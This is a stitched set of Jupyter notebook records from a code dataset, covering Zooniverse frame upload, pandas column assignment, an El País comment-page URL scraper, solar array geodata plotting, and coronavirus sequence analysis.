"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb01426c40230eb84ab3f08b23b041bb22ef46e0 | 187,091 | ipynb | Jupyter Notebook | development/notebooks/koster_new_species_frames.ipynb | ocean-data-factory-sweden/koster_zooniverse | 208273da2419b7a4227e0fa5acac5141b99c6aa0 | [
"MIT"
] | null | null | null | development/notebooks/koster_new_species_frames.ipynb | ocean-data-factory-sweden/koster_zooniverse | 208273da2419b7a4227e0fa5acac5141b99c6aa0 | [
"MIT"
] | null | null | null | development/notebooks/koster_new_species_frames.ipynb | ocean-data-factory-sweden/koster_zooniverse | 208273da2419b7a4227e0fa5acac5141b99c6aa0 | [
"MIT"
] | null | null | null | 92.849132 | 141 | 0.766873 | [
[
[
"%load_ext autoreload\n%autoreload 2",
"The autoreload extension is already loaded. To reload it, use:\n %reload_ext autoreload\n"
],
[
"import sys\nsys.path.append(\"..\")\nsys.path.append(\"../upload_subjects/\")",
"_____no_output_____"
],
[
"import argparse, os, cv2, re\nimport utils.db_utils as db_utils\nimport pandas as pd\nimport numpy as np\nimport pims\n\nfrom PIL import Image\nfrom datetime import date\nfrom utils.zooniverse_utils import auth_session\nfrom panoptes_client import (\n SubjectSet,\n Subject,\n Project,\n Panoptes,\n)\nfrom upload_frames import get_species_frames, extract_frames\nfrom utils.summary_utils import clips_summary",
"_____no_output_____"
],
[
"db_path = \"/data/db_config/koster_lab-nm.db\"\nuser = \"\"\npassword = \"\"\nconn = db_utils.create_connection(db_path)\nframes_folder = \"/data/deepsea_anemone_frames/\"",
"_____no_output_____"
],
[
"clips_summary(db_path)",
"_____no_output_____"
],
[
"#### Connect to koster_db\nconn = db_utils.create_connection(db_path)\n\n# Connect to Zooniverse\nkoster_project = auth_session(user, password)\n\n# Get id of species of interest\nspecies_id = 5.0\n\n# Identify n number of frames per classified clip that contains species of interest \nsp_frames_df = get_species_frames(species_id, conn, 3)\n\n# Get info of frames already uploaded\nuploaded_frames_df = pd.read_sql_query(\n f\"SELECT movie_id, frame_number, frame_exp_sp_id FROM subjects WHERE frame_exp_sp_id='{species_id}' and subject_type='frame'\",\n conn,\n)\n\n# Upload frames to Zooniverse that have not been uploaded\nif len(sp_frames_df) == 0:\n print(\n \"There are no subjects to upload, this may be because all of the subjects have already been uploaded\"\n )\n raise\n\nelse:\n # Create the folder to store the frames if not exist\n if not os.path.exists(frames_folder):\n os.mkdir(frames_folder)\n\n # Extract the frames and save them\n sp_frames_df[\"frame_path\"] = extract_frames(sp_frames_df, frames_folder)\n\n # Select koster db metadata associated with each frame\n sp_frames_df[\"label\"] = species_id\n sp_frames_df[\"subject_type\"] = \"frame\"\n\n sp_frames_df = sp_frames_df[\n [\n \"frame_path\",\n \"fpath\",\n \"frame_number\",\n \"fps\",\n \"movie_id\",\n \"label\",\n \"frame_exp_sp_id\",\n \"subject_type\",\n ]\n ]\n\n # Save the df as the subject metadata\n subject_metadata = sp_frames_df.set_index('frame_path').to_dict('index')",
"Videos are read in\n1632\nframes added to df\nsaving /data/deepsea_anemone_frames/000114 TMBL-ROV 2000 Säckenrevet Tape 55_frame_4500_5.0.jpg\nsaving /data/deepsea_anemone_frames/000114 TMBL-ROV 2000 Säckenrevet Tape 55_frame_4525_5.0.jpg\nsaving /data/deepsea_anemone_frames/000114 TMBL-ROV 2000 Säckenrevet Tape 55_frame_4550_5.0.jpg\nsaving /data/deepsea_anemone_frames/000114 TMBL-ROV 2000 Säckenrevet Tape 55_frame_0_5.0.jpg\nsaving /data/deepsea_anemone_frames/000114 TMBL-ROV 2000 Säckenrevet Tape 55_frame_25_5.0.jpg\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb014d69d7c3cdbe45a92fa60f925a3279e7e85e | 13,948 | ipynb | Jupyter Notebook | notebooks/pandas/df_assign_col_values.ipynb | codenamewei/pydata-science-playground | aa147b003aa4bd2afa2a6a5f00101cc0cb340f9f | [
"MIT"
] | null | null | null | notebooks/pandas/df_assign_col_values.ipynb | codenamewei/pydata-science-playground | aa147b003aa4bd2afa2a6a5f00101cc0cb340f9f | [
"MIT"
] | null | null | null | notebooks/pandas/df_assign_col_values.ipynb | codenamewei/pydata-science-playground | aa147b003aa4bd2afa2a6a5f00101cc0cb340f9f | [
"MIT"
] | null | null | null | 25.268116 | 149 | 0.329725 | [
[
[
"import pandas as pd \nimport numpy as np\n\nrows = 5\ndf = pd.DataFrame(np.random.randint(0,rows,size=(rows, 2)), columns=list('AB'))\n\ndf[\"C\"] = [0,0, 1, 1, 0]\ndf[\"D\"] = [-1, 6, -1, -1, 6]\n\ndf.head(5)",
"_____no_output_____"
]
],
[
[
"### Assign value of B = 1000 where C = 1 & D = -1 &",
"_____no_output_____"
]
],
[
[
"df2 = df\ndf2.loc[df2.D.eq(-1), 'B'] = 1000\n\ndf2.head(5)",
"_____no_output_____"
],
[
"df3 = df\ndf3.loc[df3.D.eq(-1) & df3.C.eq(1), 'B'] = 1000\n\ndf3.head(5)",
"_____no_output_____"
]
],
[
[
"### this works, but with warnings",
"_____no_output_____"
]
],
[
[
"df1 = df\ndf1[df1.D == -1].B = 1000\ndf1.head(5)\n",
"C:\\Users\\codenamewei\\.conda\\envs\\data-science-playground\\lib\\site-packages\\pandas\\core\\generic.py:5494: SettingWithCopyWarning: \nA value is trying to be set on a copy of a slice from a DataFrame.\nTry using .loc[row_indexer,col_indexer] = value instead\n\nSee the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy\n self[name] = value\n"
]
],
[
[
"# Use .loc[row_indexer,col_indexer] = value instead\n",
"_____no_output_____"
],
[
"### This works, but with warning",
"_____no_output_____"
]
],
[
[
"df_ = df\n\ndf_.iloc[df_.loc[df_.D == -1].index[0]].B = 1000\n\ndf_.head(5)",
"C:\\Users\\codenamewei\\.conda\\envs\\data-science-playground\\lib\\site-packages\\pandas\\core\\generic.py:5494: SettingWithCopyWarning: \nA value is trying to be set on a copy of a slice from a DataFrame\n\nSee the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy\n self[name] = value\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
]
] |
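A short sketch, outside the notebook above, contrasting the chained assignment that triggers `SettingWithCopyWarning` with the `.loc[row_indexer, col_indexer] = value` form that the warning recommends; the frame here is a small made-up example:

```python
import numpy as np
import pandas as pd

df = pd.DataFrame({'B': np.arange(5),
                   'C': [0, 0, 1, 1, 0],
                   'D': [-1, 6, -1, -1, 6]})

# Chained indexing: df[df.D == -1] may return a copy, so the assignment
# below might never reach df -- pandas flags it with SettingWithCopyWarning.
# df[df.D == -1].B = 1000

# Recommended form: one .loc call with a boolean row indexer and the column label.
df.loc[(df.D == -1) & (df.C == 1), 'B'] = 1000
print(df)
```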
cb015732e617447c2025905e181e7b7c63a13d44 | 141,006 | ipynb | Jupyter Notebook | resources/notebooks/OldScrapper/ElPais-getUrlsFromHemeroteca.ipynb | cfespinoza/comments-retriever | 6e46053d66297f59da2fa93a00a58158dec195ca | [
"Apache-2.0"
] | null | null | null | resources/notebooks/OldScrapper/ElPais-getUrlsFromHemeroteca.ipynb | cfespinoza/comments-retriever | 6e46053d66297f59da2fa93a00a58158dec195ca | [
"Apache-2.0"
] | 1 | 2021-12-13T20:23:17.000Z | 2021-12-13T20:23:17.000Z | resources/notebooks/OldScrapper/ElPais-getUrlsFromHemeroteca.ipynb | cfespinoza/comments-retriever | 6e46053d66297f59da2fa93a00a58158dec195ca | [
"Apache-2.0"
] | null | null | null | 63.948299 | 363 | 0.641717 | [
[
[
"import sys\nfrom PyQt5 import QtCore, QtWidgets, QtWebEngineWidgets\nfrom lxml import html as htmlRenderer\nimport requests\nimport json\nfrom datetime import date, datetime, timedelta",
"_____no_output_____"
],
[
"def render(source_url):\n \"\"\"Fully render HTML, JavaScript and all.\"\"\"\n\n import sys\n from PyQt5.QtWidgets import QApplication\n from PyQt5.QtCore import QUrl\n from PyQt5.QtWebEngineWidgets import QWebEngineView\n\n class Render(QWebEngineView):\n def __init__(self, url):\n self.html = None\n self.app = QApplication(sys.argv)\n QWebEngineView.__init__(self)\n self.loadFinished.connect(self._loadFinished)\n #self.setHtml(html)\n self.load(QUrl(url))\n self.app.exec_()\n\n def _loadFinished(self, result):\n # This is an async call, you need to wait for this\n # to be called before closing the app\n self.page().toHtml(self._callable)\n\n def _callable(self, data):\n self.html = data\n # Data has been stored, it's safe to quit the app\n self.app.quit()\n\n return Render(source_url).html",
"_____no_output_____"
]
],
[
[
"# Aux Functions",
"_____no_output_____"
]
],
[
[
"def generateDates(start=date(2019, 1, 1), end=date(2019, 8, 31), delta=timedelta(days=1), strFormat=\"\"):\n curr = start\n dates = []\n while curr < end:\n if strFormat == \"\":\n dates.append(str(curr))\n else:\n dates.append(curr.strftime(strFormat))\n curr += delta\n return dates",
"_____no_output_____"
],
[
"len(generateDates(date(2019, 1, 1), date(2019, 8, 31)))",
"_____no_output_____"
],
[
"a = generateDates(date(2019, 1, 1), date(2019, 8, 31))",
"_____no_output_____"
],
[
"date_1 =a[0]",
"_____no_output_____"
],
[
"date_1.strftime(\"%Y/%m/%d\")",
"_____no_output_____"
],
[
"date_1.day.to_bytes()",
"_____no_output_____"
],
[
"date_1.day",
"_____no_output_____"
],
[
"str(date_1).replace('-', '/')",
"_____no_output_____"
],
[
"dateFormat = \"%Y/%m/%d\"\ndatesBase = generateDates(date(2019, 1, 1), date(2019, 8, 31), strFormat=dateFormat)\nextraDateInfo = [\"m\", \"t\", \"n\"]\nurlTemplate = \"https://elpais.com/hemeroteca/elpais/{date}/{partOfDay}/portada.html\"\ndef generateHemerotecaUrls(urlBase, dates, extraInfo):\n urlsPerDay = []\n print(\" \\t Url-Base: {}\".format(urlBase))\n for d in dates:\n partOfDayUrls = [ urlBase.format(date=d, partOfDay=p) for p in extraInfo ]\n urlsPerDay = urlsPerDay + partOfDayUrls\n print(\" \\t -> urlsPerDay length: {}\".format(len(urlsPerDay)))\n return urlsPerDay\n ",
"_____no_output_____"
],
[
"urlTemplate",
"_____no_output_____"
],
[
"generateHemerotecaUrls(urlTemplate, datesBase, extraDateInfo)",
" \t Url-Base: https://elpais.com/hemeroteca/elpais/{date}/{partOfDay}/portada.html\n \t -> urlsPerDay length: 3\n \t -> urlsPerDay length: 6\n \t -> urlsPerDay length: 9\n \t -> urlsPerDay length: 12\n \t -> urlsPerDay length: 15\n \t -> urlsPerDay length: 18\n \t -> urlsPerDay length: 21\n \t -> urlsPerDay length: 24\n \t -> urlsPerDay length: 27\n \t -> urlsPerDay length: 30\n \t -> urlsPerDay length: 33\n \t -> urlsPerDay length: 36\n \t -> urlsPerDay length: 39\n \t -> urlsPerDay length: 42\n \t -> urlsPerDay length: 45\n \t -> urlsPerDay length: 48\n \t -> urlsPerDay length: 51\n \t -> urlsPerDay length: 54\n \t -> urlsPerDay length: 57\n \t -> urlsPerDay length: 60\n \t -> urlsPerDay length: 63\n \t -> urlsPerDay length: 66\n \t -> urlsPerDay length: 69\n \t -> urlsPerDay length: 72\n \t -> urlsPerDay length: 75\n \t -> urlsPerDay length: 78\n \t -> urlsPerDay length: 81\n \t -> urlsPerDay length: 84\n \t -> urlsPerDay length: 87\n \t -> urlsPerDay length: 90\n \t -> urlsPerDay length: 93\n \t -> urlsPerDay length: 96\n \t -> urlsPerDay length: 99\n \t -> urlsPerDay length: 102\n \t -> urlsPerDay length: 105\n \t -> urlsPerDay length: 108\n \t -> urlsPerDay length: 111\n \t -> urlsPerDay length: 114\n \t -> urlsPerDay length: 117\n \t -> urlsPerDay length: 120\n \t -> urlsPerDay length: 123\n \t -> urlsPerDay length: 126\n \t -> urlsPerDay length: 129\n \t -> urlsPerDay length: 132\n \t -> urlsPerDay length: 135\n \t -> urlsPerDay length: 138\n \t -> urlsPerDay length: 141\n \t -> urlsPerDay length: 144\n \t -> urlsPerDay length: 147\n \t -> urlsPerDay length: 150\n \t -> urlsPerDay length: 153\n \t -> urlsPerDay length: 156\n \t -> urlsPerDay length: 159\n \t -> urlsPerDay length: 162\n \t -> urlsPerDay length: 165\n \t -> urlsPerDay length: 168\n \t -> urlsPerDay length: 171\n \t -> urlsPerDay length: 174\n \t -> urlsPerDay length: 177\n \t -> urlsPerDay length: 180\n \t -> urlsPerDay length: 183\n \t -> urlsPerDay length: 186\n \t -> urlsPerDay length: 189\n \t -> urlsPerDay length: 192\n \t -> urlsPerDay length: 195\n \t -> urlsPerDay length: 198\n \t -> urlsPerDay length: 201\n \t -> urlsPerDay length: 204\n \t -> urlsPerDay length: 207\n \t -> urlsPerDay length: 210\n \t -> urlsPerDay length: 213\n \t -> urlsPerDay length: 216\n \t -> urlsPerDay length: 219\n \t -> urlsPerDay length: 222\n \t -> urlsPerDay length: 225\n \t -> urlsPerDay length: 228\n \t -> urlsPerDay length: 231\n \t -> urlsPerDay length: 234\n \t -> urlsPerDay length: 237\n \t -> urlsPerDay length: 240\n \t -> urlsPerDay length: 243\n \t -> urlsPerDay length: 246\n \t -> urlsPerDay length: 249\n \t -> urlsPerDay length: 252\n \t -> urlsPerDay length: 255\n \t -> urlsPerDay length: 258\n \t -> urlsPerDay length: 261\n \t -> urlsPerDay length: 264\n \t -> urlsPerDay length: 267\n \t -> urlsPerDay length: 270\n \t -> urlsPerDay length: 273\n \t -> urlsPerDay length: 276\n \t -> urlsPerDay length: 279\n \t -> urlsPerDay length: 282\n \t -> urlsPerDay length: 285\n \t -> urlsPerDay length: 288\n \t -> urlsPerDay length: 291\n \t -> urlsPerDay length: 294\n \t -> urlsPerDay length: 297\n \t -> urlsPerDay length: 300\n \t -> urlsPerDay length: 303\n \t -> urlsPerDay length: 306\n \t -> urlsPerDay length: 309\n \t -> urlsPerDay length: 312\n \t -> urlsPerDay length: 315\n \t -> urlsPerDay length: 318\n \t -> urlsPerDay length: 321\n \t -> urlsPerDay length: 324\n \t -> urlsPerDay length: 327\n \t -> urlsPerDay length: 330\n \t -> urlsPerDay length: 333\n \t -> urlsPerDay length: 336\n \t -> urlsPerDay length: 339\n 
\t -> urlsPerDay length: 342\n \t -> urlsPerDay length: 345\n \t -> urlsPerDay length: 348\n \t -> urlsPerDay length: 351\n \t -> urlsPerDay length: 354\n \t -> urlsPerDay length: 357\n \t -> urlsPerDay length: 360\n \t -> urlsPerDay length: 363\n \t -> urlsPerDay length: 366\n \t -> urlsPerDay length: 369\n \t -> urlsPerDay length: 372\n \t -> urlsPerDay length: 375\n \t -> urlsPerDay length: 378\n \t -> urlsPerDay length: 381\n \t -> urlsPerDay length: 384\n \t -> urlsPerDay length: 387\n \t -> urlsPerDay length: 390\n \t -> urlsPerDay length: 393\n \t -> urlsPerDay length: 396\n \t -> urlsPerDay length: 399\n \t -> urlsPerDay length: 402\n \t -> urlsPerDay length: 405\n \t -> urlsPerDay length: 408\n \t -> urlsPerDay length: 411\n \t -> urlsPerDay length: 414\n \t -> urlsPerDay length: 417\n \t -> urlsPerDay length: 420\n \t -> urlsPerDay length: 423\n \t -> urlsPerDay length: 426\n \t -> urlsPerDay length: 429\n \t -> urlsPerDay length: 432\n \t -> urlsPerDay length: 435\n \t -> urlsPerDay length: 438\n \t -> urlsPerDay length: 441\n \t -> urlsPerDay length: 444\n \t -> urlsPerDay length: 447\n \t -> urlsPerDay length: 450\n \t -> urlsPerDay length: 453\n \t -> urlsPerDay length: 456\n \t -> urlsPerDay length: 459\n \t -> urlsPerDay length: 462\n \t -> urlsPerDay length: 465\n \t -> urlsPerDay length: 468\n \t -> urlsPerDay length: 471\n \t -> urlsPerDay length: 474\n \t -> urlsPerDay length: 477\n \t -> urlsPerDay length: 480\n \t -> urlsPerDay length: 483\n \t -> urlsPerDay length: 486\n \t -> urlsPerDay length: 489\n \t -> urlsPerDay length: 492\n \t -> urlsPerDay length: 495\n \t -> urlsPerDay length: 498\n \t -> urlsPerDay length: 501\n \t -> urlsPerDay length: 504\n \t -> urlsPerDay length: 507\n \t -> urlsPerDay length: 510\n \t -> urlsPerDay length: 513\n \t -> urlsPerDay length: 516\n \t -> urlsPerDay length: 519\n \t -> urlsPerDay length: 522\n \t -> urlsPerDay length: 525\n \t -> urlsPerDay length: 528\n \t -> urlsPerDay length: 531\n \t -> urlsPerDay length: 534\n \t -> urlsPerDay length: 537\n \t -> urlsPerDay length: 540\n \t -> urlsPerDay length: 543\n \t -> urlsPerDay length: 546\n \t -> urlsPerDay length: 549\n \t -> urlsPerDay length: 552\n \t -> urlsPerDay length: 555\n \t -> urlsPerDay length: 558\n \t -> urlsPerDay length: 561\n \t -> urlsPerDay length: 564\n \t -> urlsPerDay length: 567\n \t -> urlsPerDay length: 570\n \t -> urlsPerDay length: 573\n \t -> urlsPerDay length: 576\n \t -> urlsPerDay length: 579\n \t -> urlsPerDay length: 582\n \t -> urlsPerDay length: 585\n \t -> urlsPerDay length: 588\n \t -> urlsPerDay length: 591\n \t -> urlsPerDay length: 594\n \t -> urlsPerDay length: 597\n \t -> urlsPerDay length: 600\n \t -> urlsPerDay length: 603\n \t -> urlsPerDay length: 606\n \t -> urlsPerDay length: 609\n \t -> urlsPerDay length: 612\n \t -> urlsPerDay length: 615\n \t -> urlsPerDay length: 618\n \t -> urlsPerDay length: 621\n \t -> urlsPerDay length: 624\n \t -> urlsPerDay length: 627\n \t -> urlsPerDay length: 630\n \t -> urlsPerDay length: 633\n \t -> urlsPerDay length: 636\n \t -> urlsPerDay length: 639\n \t -> urlsPerDay length: 642\n \t -> urlsPerDay length: 645\n \t -> urlsPerDay length: 648\n \t -> urlsPerDay length: 651\n \t -> urlsPerDay length: 654\n \t -> urlsPerDay length: 657\n \t -> urlsPerDay length: 660\n \t -> urlsPerDay length: 663\n \t -> urlsPerDay length: 666\n \t -> urlsPerDay length: 669\n \t -> urlsPerDay length: 672\n \t -> urlsPerDay length: 675\n \t -> urlsPerDay length: 678\n \t -> urlsPerDay length: 681\n \t -> urlsPerDay 
length: 684\n \t -> urlsPerDay length: 687\n \t -> urlsPerDay length: 690\n \t -> urlsPerDay length: 693\n \t -> urlsPerDay length: 696\n \t -> urlsPerDay length: 699\n \t -> urlsPerDay length: 702\n \t -> urlsPerDay length: 705\n \t -> urlsPerDay length: 708\n \t -> urlsPerDay length: 711\n \t -> urlsPerDay length: 714\n \t -> urlsPerDay length: 717\n \t -> urlsPerDay length: 720\n \t -> urlsPerDay length: 723\n \t -> urlsPerDay length: 726\n"
]
],
[
[
"# Getting urls",
"_____no_output_____"
]
],
[
[
"url=\"https://www.elpais.com/\"\nrenderUrl = render(url)\nrenderedPage = htmlRenderer.fromstring(renderUrl)",
"_____no_output_____"
],
[
"auxLinks = renderedPage.xpath(\"//a/@href\")",
"_____no_output_____"
],
[
"# obtener links, cuidado que alguno ya empieza por http...\nauxFinalLinks = list(dict.fromkeys([link for link in auxLinks \n if not link.endswith(\"/\") \n and not \"#comentarios\" in link\n and not link.endswith(\"=home\")]))\n",
"_____no_output_____"
],
[
"auxFinalLinks",
"_____no_output_____"
],
[
"len(auxFinalLinks)",
"_____no_output_____"
],
[
"finalLinks = []\nfor l in auxFinalLinks:\n if l.startswith(\"http\"):\n finalLinks.append(l)\n elif l.startswith(\"//\"):\n finalLinks.append(\"https:{}\".format(l))\n else:\n finalLinks.append(\"https://www.elpais.com{}\".format(l))\nprint(\" -> TOtal of url retrieved to extract comments: {}\".format(len(finalLinks)))",
" -> TOtal of url retrieved to extract comments: 373\n"
],
[
"finalLinks",
"_____no_output_____"
],
[
"# Url get info = https://elpais.com/ThreadeskupSimple?action=info&th=1564664936-bca025601586bc5a00ef0c26fdd878f6&rnd=1232123123",
"_____no_output_____"
],
[
"# # Url get comments = \n# https://elpais.com/OuteskupSimple?s=&rnd=0.7131093272405999&th=2&msg=1564664936-bca025601586bc5a00ef0c26fdd878f6&p=1&nummsg=40&tt=1\n# https://elpais.com/OuteskupSimple?s=&rnd=0.4308991070814918&th=2&msg=1564664936-bca025601586bc5a00ef0c26fdd878f6&p=2&nummsg=40&tt=1\n# https://elpais.com/OuteskupSimple?s=&rnd=0.17594169864899367&th=2&msg=1564664936-bca025601586bc5a00ef0c26fdd878f6&p=3&nummsg=40&tt=1",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
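Building only on the endpoint patterns noted in the comments above, a hedged sketch of how the paginated `OuteskupSimple` comment URL might be walked; the thread id is copied from the commented example, while the page range, stopping rule, and response handling are assumptions made purely for illustration (the response format is not verified here):

```python
import random
import requests

# Thread id taken from the commented example URLs above
msg_id = "1564664936-bca025601586bc5a00ef0c26fdd878f6"
base = "https://elpais.com/OuteskupSimple"

for page in range(1, 4):  # the example URLs above show p=1..3
    params = {"s": "", "rnd": random.random(), "th": 2,
              "msg": msg_id, "p": page, "nummsg": 40, "tt": 1}
    resp = requests.get(base, params=params)
    print(page, resp.status_code, len(resp.content))
```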
cb0160f21f6522164e1c6c5b9944c25bef292f45 | 672,878 | ipynb | Jupyter Notebook | ShowSolarArrayLocations.ipynb | ccai-course/Module2-Mitigation | bab5297d15aa400b691ca147e7234d945561a94b | [
"MIT"
] | null | null | null | ShowSolarArrayLocations.ipynb | ccai-course/Module2-Mitigation | bab5297d15aa400b691ca147e7234d945561a94b | [
"MIT"
] | null | null | null | ShowSolarArrayLocations.ipynb | ccai-course/Module2-Mitigation | bab5297d15aa400b691ca147e7234d945561a94b | [
"MIT"
] | null | null | null | 809.720818 | 253,858 | 0.939292 | [
[
[
"<a href=\"https://colab.research.google.com/github/ccai-course/Module2-Mitigation/blob/main/ShowSolarArrayLocations.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
]
],
[
[
" !pip install geopandas",
"Collecting geopandas\n Downloading geopandas-0.9.0-py2.py3-none-any.whl (994 kB)\n\u001b[K |████████████████████████████████| 994 kB 5.4 MB/s \n\u001b[?25hRequirement already satisfied: pandas>=0.24.0 in /usr/local/lib/python3.7/dist-packages (from geopandas) (1.1.5)\nCollecting pyproj>=2.2.0\n Downloading pyproj-3.1.0-cp37-cp37m-manylinux2010_x86_64.whl (6.6 MB)\n\u001b[K |████████████████████████████████| 6.6 MB 37.8 MB/s \n\u001b[?25hRequirement already satisfied: shapely>=1.6 in /usr/local/lib/python3.7/dist-packages (from geopandas) (1.7.1)\nCollecting fiona>=1.8\n Downloading Fiona-1.8.20-cp37-cp37m-manylinux1_x86_64.whl (15.4 MB)\n\u001b[K |████████████████████████████████| 15.4 MB 33 kB/s \n\u001b[?25hRequirement already satisfied: certifi in /usr/local/lib/python3.7/dist-packages (from fiona>=1.8->geopandas) (2021.5.30)\nCollecting munch\n Downloading munch-2.5.0-py2.py3-none-any.whl (10 kB)\nCollecting click-plugins>=1.0\n Downloading click_plugins-1.1.1-py2.py3-none-any.whl (7.5 kB)\nRequirement already satisfied: click>=4.0 in /usr/local/lib/python3.7/dist-packages (from fiona>=1.8->geopandas) (7.1.2)\nCollecting cligj>=0.5\n Downloading cligj-0.7.2-py3-none-any.whl (7.1 kB)\nRequirement already satisfied: setuptools in /usr/local/lib/python3.7/dist-packages (from fiona>=1.8->geopandas) (57.4.0)\nRequirement already satisfied: six>=1.7 in /usr/local/lib/python3.7/dist-packages (from fiona>=1.8->geopandas) (1.15.0)\nRequirement already satisfied: attrs>=17 in /usr/local/lib/python3.7/dist-packages (from fiona>=1.8->geopandas) (21.2.0)\nRequirement already satisfied: python-dateutil>=2.7.3 in /usr/local/lib/python3.7/dist-packages (from pandas>=0.24.0->geopandas) (2.8.2)\nRequirement already satisfied: pytz>=2017.2 in /usr/local/lib/python3.7/dist-packages (from pandas>=0.24.0->geopandas) (2018.9)\nRequirement already satisfied: numpy>=1.15.4 in /usr/local/lib/python3.7/dist-packages (from pandas>=0.24.0->geopandas) (1.19.5)\nInstalling collected packages: munch, cligj, click-plugins, pyproj, fiona, geopandas\nSuccessfully installed click-plugins-1.1.1 cligj-0.7.2 fiona-1.8.20 geopandas-0.9.0 munch-2.5.0 pyproj-3.1.0\n"
],
[
"# Read in solar image\n\n# Import library functions to download and read images\nimport requests\nfrom io import BytesIO\n\n# Dataset: Distributed Solar Photovoltaic Array Location and Extent Data Set for Remote Sensing Object Identification\n# California Aerial Imagery SolarArrayPolygons.geojson\n\nurl = 'https://ndownloader.figshare.com/files/24115691'\n\ndownloader_response = requests.get(url)\nbyte_stream = BytesIO(downloader_response.content)\n\n# Import geopandas library for geospatial data\nimport geopandas as gpd\n\nsolar_array_polygons_df = gpd.read_file(byte_stream)\nsolar_array_polygons_df.head()",
"_____no_output_____"
],
[
"solar_array_polygons_df[solar_array_polygons_df['city'] == 'Oxnard']",
"_____no_output_____"
],
[
"# Read in solar image\n\n# Import library functions to download and read images\nimport requests\nfrom io import BytesIO\nfrom skimage import io\n\n# A Oxnard 621051913 Aerial Tile\ntile_url = 'https://ndownloader.figshare.com/files/5287822'\n\ndownloader_response = requests.get(tile_url)\nimg = io.imread(BytesIO(downloader_response.content))",
"_____no_output_____"
],
[
"import matplotlib.pyplot as plt\nplt.figure()\nplt.imshow(img)",
"_____no_output_____"
],
[
"from skimage import filters\nplt.figure()\nplt.imshow(filters.sobel(img[:,:,0]))",
"_____no_output_____"
],
[
"polygons_px = solar_array_polygons_df[solar_array_polygons_df['city'] == 'Oxnard'][solar_array_polygons_df['image_name'] == '621051913']['polygon_vertices_pixels']",
"/usr/local/lib/python3.7/dist-packages/geopandas/geodataframe.py:1299: UserWarning: Boolean Series key will be reindexed to match DataFrame index.\n result = super(GeoDataFrame, self).__getitem__(key)\n"
],
[
"import numpy as np\n\n# show one polygon with solar array inside\nn=2\npolygon_vertices = [np.array(eval(a)) for a in polygons_px]\ntop_left, bottom_right = (int(min(polygon_vertices[n][:,1])), int(min(polygon_vertices[n][:,0]))), (int(max(polygon_vertices[n][:,1]))+1, int(max(polygon_vertices[n][:,0]))+1)\n\nplt.figure()\nplt.imshow(img[top_left[0]-50:bottom_right[0]+50,top_left[1]-50:bottom_right[1]+50,:])\n\nplt.figure()\nplt.imshow(filters.sobel(img[top_left[0]-50:bottom_right[0]+50,top_left[1]-50:bottom_right[1]+50,0]))",
"_____no_output_____"
],
[
"top_left, bottom_right",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb01843afbd1f9daf5e700a2fd75ab61ac360952 | 18,581 | ipynb | Jupyter Notebook | antigenic_evolution/bhatt_test.ipynb | nextstrain/seasonal-cov | 9dee4e145d003b839729b86ff9c7b74bb8483e55 | [
"MIT"
] | 4 | 2020-03-24T21:54:12.000Z | 2020-03-26T19:12:05.000Z | antigenic_evolution/bhatt_test.ipynb | blab/seasonal-cov-adaptive-evolution | 9dee4e145d003b839729b86ff9c7b74bb8483e55 | [
"MIT"
] | null | null | null | antigenic_evolution/bhatt_test.ipynb | blab/seasonal-cov-adaptive-evolution | 9dee4e145d003b839729b86ff9c7b74bb8483e55 | [
"MIT"
] | null | null | null | 40.131749 | 142 | 0.492116 | [
[
[
"import math\nimport json\nimport pandas as pd\nimport numpy as np\nfrom Bio import SeqIO\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy import stats",
"\nBad key \"text.kerning_factor\" on line 4 in\n/Users/katekistler/anaconda3/envs/nextstrain/lib/python3.6/site-packages/matplotlib/mpl-data/stylelib/_classic_test_patch.mplstyle.\nYou probably need to get an updated matplotlibrc file from\nhttps://github.com/matplotlib/matplotlib/blob/v3.1.3/matplotlibrc.template\nor from the matplotlib source distribution\n"
],
[
"#make test data set to sanity check\noutgroup_test = ['ATGGAGATT']\ntest_seqs = ['ATGGAGATT', 'ATGGAGAAT', 'ATGGAGATT',\n 'ATGGAGAAT', 'ATGGAGATC', 'ATCGAGATT',\n 'ATGGAGACT', 'ATGGAGATT', 'ATGGAGATT',\n 'ATGGGGATT', 'ATGCAGATT', 'ATGCAGATT', 'ATGGAGATT']\ntest_dates = [2010, 2010, 2011,\n 2012, 2012,\n 2013, 2013, 2013,\n 2014, 2014, 2014, 2014]\n",
"_____no_output_____"
],
[
"#given a polymorphism frequency, return bin\ndef frequency_binning(x):\n #nan frequencies are when there is no sequence coverage at the given position\n if math.isnan(x):\n f_bin = float('nan')\n else:\n if x == 1.0:\n f_bin = 'f'\n elif x>=0.75:\n f_bin = 'h'\n elif x<0.75 and x>=0.15:\n f_bin = 'm'\n elif x<0.15:\n f_bin='l'\n\n return f_bin",
"_____no_output_____"
],
[
